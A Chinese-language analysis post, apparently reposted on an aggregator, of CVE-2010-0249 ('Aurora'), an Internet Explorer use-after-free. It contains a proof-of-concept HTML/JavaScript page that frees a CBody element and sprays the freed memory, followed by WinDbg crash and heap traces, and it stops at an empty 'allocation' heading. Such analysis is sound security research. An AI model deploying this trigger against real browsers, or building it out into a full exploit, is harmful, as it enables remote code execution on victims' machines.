CVE-2010-0249 极光

Posted Ox9A82

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2010-0249 极光相关的知识,希望对你有一定的参考价值。

传说中的极光漏洞

Microsoft Internet Explorer非法事件操作内存破坏漏洞

        Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 
        Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。

 

POC如下

<html>          
<head>  
<script>  
var obj, event_obj;      

function ev1(evt)     
{              
    event_obj = document.createEventObject(evt);               
    document.getElementById("sp1").innerHTML = "";  
    window.setInterval(ev2, 1);           
}  
          
function ev2()          
{  
var data, tmp;                  
data = "";  
tmp = unescape("%u0a0a%u0a0a");                  
for (var i = 0 ; i < 4 ; i++) data += tmp;  
for (i = 0 ; i < obj.length ; i++ ) 
{  
  obj[i].data = data;            
 }  
 event_obj.srcElement;              
}  
  
obj = new Array();  
event_obj = null;  
for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");  
</script>  
</head>  
<body>  
    <span id="sp1">  
      <img src="aurora.gif" onload="ev1(event)">  
    </span>          
</body>  
</html>  

没能找到合适的POC,这个是我用网上的exp修改来的,有些繁琐。

 

开门见山,直接看出了是CBody对象发生的UAF

1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor‘+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e

 

分配

 

以上是关于CVE-2010-0249 极光的主要内容,如果未能解决你的问题,请参考以下文章

极光推送实战感受

极光推送PHP5.1示例代码

极光推送工具类

极光推送工具类

极光推送工具类

极光推送java代码